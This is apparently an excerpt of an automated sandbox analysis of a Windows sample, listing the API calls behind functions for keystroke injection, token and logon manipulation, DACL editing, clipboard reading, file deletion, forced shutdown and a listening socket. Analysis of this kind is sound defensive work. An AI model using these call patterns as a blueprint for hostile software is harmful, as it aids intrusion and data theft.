                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                          • String ID: %d/%02d/%02d
                          • API String ID: 4054740463-328681919
                          • Opcode ID: 34e0857b6bdbbf14dbaadf8e1ff9a82fe7c81b9e3005ae1703360cf3177f5452
                          • Instruction ID: 99a6c77eb65ec6794f474a72c9535e37b6cd1d25f93c02eac200b07796faebef
                          • Opcode Fuzzy Hash: 34e0857b6bdbbf14dbaadf8e1ff9a82fe7c81b9e3005ae1703360cf3177f5452
                          • Instruction Fuzzy Hash: CF12EF71600215ABEF258F28EC49FAE7BF8EF45310F14816AF515EA2E1DB789942CB50
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0071F998
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0075F474
                          • IsIconic.USER32(00000000), ref: 0075F47D
                          • ShowWindow.USER32(00000000,00000009), ref: 0075F48A
                          • SetForegroundWindow.USER32(00000000), ref: 0075F494
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075F4AA
                          • GetCurrentThreadId.KERNEL32 ref: 0075F4B1
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075F4BD
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0075F4CE
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0075F4D6
                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0075F4DE
                          • SetForegroundWindow.USER32(00000000), ref: 0075F4E1
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F4F6
                          • keybd_event.USER32(00000012,00000000), ref: 0075F501
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F50B
                          • keybd_event.USER32(00000012,00000000), ref: 0075F510
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F519
                          • keybd_event.USER32(00000012,00000000), ref: 0075F51E
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F528
                          • keybd_event.USER32(00000012,00000000), ref: 0075F52D
                          • SetForegroundWindow.USER32(00000000), ref: 0075F530
                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0075F557
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: d4604cd1655c97099567a36da721b976ee5afae75c8d63810b0100b94d68f20c
                          • Instruction ID: 61a340a3037905115773d19141d0f9bfed7a53a3838065a0082c20edcabbf738
                          • Opcode Fuzzy Hash: d4604cd1655c97099567a36da721b976ee5afae75c8d63810b0100b94d68f20c
                          • Instruction Fuzzy Hash: 9531A071A40318BFEF216BB55C4AFBF7E6CEB44B50F204066FA00E61D1D6B85D11AAA4
                          APIs
                            • Part of subcall function 007616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
                            • Part of subcall function 007616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
                            • Part of subcall function 007616C3: GetLastError.KERNEL32 ref: 0076174A
                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00761286
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007612A8
                          • CloseHandle.KERNEL32(?), ref: 007612B9
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007612D1
                          • GetProcessWindowStation.USER32 ref: 007612EA
                          • SetProcessWindowStation.USER32(00000000), ref: 007612F4
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00761310
                            • Part of subcall function 007610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007611FC), ref: 007610D4
                            • Part of subcall function 007610BF: CloseHandle.KERNEL32(?,?,007611FC), ref: 007610E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                          • String ID: $default$winsta0$Z|
                          • API String ID: 22674027-2860067467
                          • Opcode ID: c7f4781a33dd6e54c9418b550830dcd27feae9ee387faed501d9f9d81b2b8da4
                          • Instruction ID: e091b97bd172c2b3f46c4c9e62a95b7f359bf8f2c536893fb7b0676a32c77ebe
                          • Opcode Fuzzy Hash: c7f4781a33dd6e54c9418b550830dcd27feae9ee387faed501d9f9d81b2b8da4
                          • Instruction Fuzzy Hash: 98819B71900248AFDF218FA4DC49FEE7FB9EF04700F18812AFD12A61A0CB399945CB65
                          APIs
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
                            • Part of subcall function 007610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
                            • Part of subcall function 007610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
                            • Part of subcall function 007610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761136
                            • Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00760BCC
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00760C00
                          • GetLengthSid.ADVAPI32(?), ref: 00760C17
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00760C51
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00760C6D
                          • GetLengthSid.ADVAPI32(?), ref: 00760C84
                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00760C8C
                          • HeapAlloc.KERNEL32(00000000), ref: 00760C93
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00760CB4
                          • CopySid.ADVAPI32(00000000), ref: 00760CBB
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00760CEA
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00760D0C
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00760D1E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D45
                          • HeapFree.KERNEL32(00000000), ref: 00760D4C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D55
                          • HeapFree.KERNEL32(00000000), ref: 00760D5C
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760D65
                          • HeapFree.KERNEL32(00000000), ref: 00760D6C
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00760D78
                          • HeapFree.KERNEL32(00000000), ref: 00760D7F
                            • Part of subcall function 00761193: GetProcessHeap.KERNEL32(00000008,00760BB1,?,00000000,?,00760BB1,?), ref: 007611A1
                            • Part of subcall function 00761193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00760BB1,?), ref: 007611A8
                            • Part of subcall function 00761193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00760BB1,?), ref: 007611B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                          • String ID:
                          • API String ID: 4175595110-0
                          • Opcode ID: dd4846010f8c237fbc13e91d2a0351a29fa501860b2caf834ba51c6cb2b60717
                          • Instruction ID: c50aea6592514775f21f96e81fff12eff2e924226aec67e1fa1d71e0f6badb5c
                          • Opcode Fuzzy Hash: dd4846010f8c237fbc13e91d2a0351a29fa501860b2caf834ba51c6cb2b60717
                          • Instruction Fuzzy Hash: A2715E71A0020AAFDF11DFA4DC49BEFBBB8BF05300F048615ED15A6291D779A906CBA4
                          APIs
                          • OpenClipboard.USER32(0079CC08), ref: 0077EB29
                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0077EB37
                          • GetClipboardData.USER32(0000000D), ref: 0077EB43
                          • CloseClipboard.USER32 ref: 0077EB4F
                          • GlobalLock.KERNEL32(00000000), ref: 0077EB87
                          • CloseClipboard.USER32 ref: 0077EB91
                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0077EBBC
                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0077EBC9
                          • GetClipboardData.USER32(00000001), ref: 0077EBD1
                          • GlobalLock.KERNEL32(00000000), ref: 0077EBE2
                          • GlobalUnlock.KERNEL32(00000000,?), ref: 0077EC22
                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0077EC38
                          • GetClipboardData.USER32(0000000F), ref: 0077EC44
                          • GlobalLock.KERNEL32(00000000), ref: 0077EC55
                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0077EC77
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0077EC94
                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0077ECD2
                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0077ECF3
                          • CountClipboardFormats.USER32 ref: 0077ED14
                          • CloseClipboard.USER32 ref: 0077ED59
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                          • String ID:
                          • API String ID: 420908878-0
                          • Opcode ID: 267445dfb915418429015c75a32b1d592a6502a299b4f803a0cb88d77d560187
                          • Instruction ID: 960a4d69a915933fde2922a5013d36d7f727826d5741638e11ff1a4aa028e8fa
                          • Opcode Fuzzy Hash: 267445dfb915418429015c75a32b1d592a6502a299b4f803a0cb88d77d560187
                          • Instruction Fuzzy Hash: 3161D474204301DFDB11EF24D889F2ABBE4AF88744F04855AF45A972E2DB39DD06CB62
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 007769BE
                          • FindClose.KERNEL32(00000000), ref: 00776A12
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00776A4E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00776A75
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00776AB2
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00776ADF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                          • API String ID: 3830820486-3289030164
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00779663
                          • GetFileAttributesW.KERNEL32(?), ref: 007796A1
                          • SetFileAttributesW.KERNEL32(?,?), ref: 007796BB
                          • FindNextFileW.KERNEL32(00000000,?), ref: 007796D3
                          • FindClose.KERNEL32(00000000), ref: 007796DE
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007796FA
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0077974A
                          • SetCurrentDirectoryW.KERNEL32(007C6B7C), ref: 00779768
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00779772
                          • FindClose.KERNEL32(00000000), ref: 0077977F
                          • FindClose.KERNEL32(00000000), ref: 0077978F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1409584000-438819550
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007797BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00779819
                          • FindClose.KERNEL32(00000000), ref: 00779824
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00779840
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00779890
                          • SetCurrentDirectoryW.KERNEL32(007C6B7C), ref: 007798AE
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007798B8
                          • FindClose.KERNEL32(00000000), ref: 007798C5
                          • FindClose.KERNEL32(00000000), ref: 007798D5
                            • Part of subcall function 0076DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0076DB00
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 2640511053-438819550
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00778257
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00778267
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00778273
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00778310
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00778324
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00778356
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0077838C
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00778395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local$System
                          • String ID: *.*
                          • API String ID: 1464919966-438819550
                          APIs
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                            • Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 0076D122
                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0076D1DD
                          • MoveFileW.KERNEL32(?,?), ref: 0076D1F0
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0076D20D
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076D237
                            • Part of subcall function 0076D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0076D21C,?,?), ref: 0076D2B2
                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0076D253
                          • FindClose.KERNEL32(00000000), ref: 0076D264
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                          • String ID: \*.*
                          • API String ID: 1946585618-1173974218
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          APIs
                            • Part of subcall function 007616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
                            • Part of subcall function 007616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
                            • Part of subcall function 007616C3: GetLastError.KERNEL32 ref: 0076174A
                          • ExitWindowsEx.USER32(?,00000000), ref: 0076E932
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $ $@$SeShutdownPrivilege
                          • API String ID: 2234035333-3163812486
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00781276
                          • WSAGetLastError.WSOCK32 ref: 00781283
                          • bind.WSOCK32(00000000,?,00000010), ref: 007812BA
                          • WSAGetLastError.WSOCK32 ref: 007812C5
                          • closesocket.WSOCK32(00000000), ref: 007812F4
                          • listen.WSOCK32(00000000,00000005), ref: 00781303
                          • WSAGetLastError.WSOCK32 ref: 0078130D
                          • closesocket.WSOCK32(00000000), ref: 0078133C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$closesocket$bindlistensocket
                          • String ID:
                          • API String ID: 540024437-0
                          APIs
                          • _free.LIBCMT ref: 0073B9D4
                          • _free.LIBCMT ref: 0073B9F8
                          • _free.LIBCMT ref: 0073BB7F
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007A3700), ref: 0073BB91
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0073BC09
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D1270,000000FF,?,0000003F,00000000,?), ref: 0073BC36
                          • _free.LIBCMT ref: 0073BD4B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID:
                          • API String ID: 314583886-0
                          APIs
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                            • Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 0076D420
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0076D470
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076D481
                          • FindClose.KERNEL32(00000000), ref: 0076D498
                          • FindClose.KERNEL32(00000000), ref: 0076D4A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                          • String ID: \*.*
                          • API String ID: 2649000838-1173974218
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          APIs
                          • _wcslen.LIBCMT ref: 007764DC
                          • CoInitialize.OLE32(00000000), ref: 00776639
                          • CoCreateInstance.OLE32(0079FCF8,00000000,00000001,0079FB68,?), ref: 00776650
                          • CoUninitialize.OLE32 ref: 007768D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          APIs
                          • GetForegroundWindow.USER32(?,?,00000000), ref: 007822E8
                            • Part of subcall function 0077E4EC: GetWindowRect.USER32(?,?), ref: 0077E504
                          • GetDesktopWindow.USER32 ref: 00782312
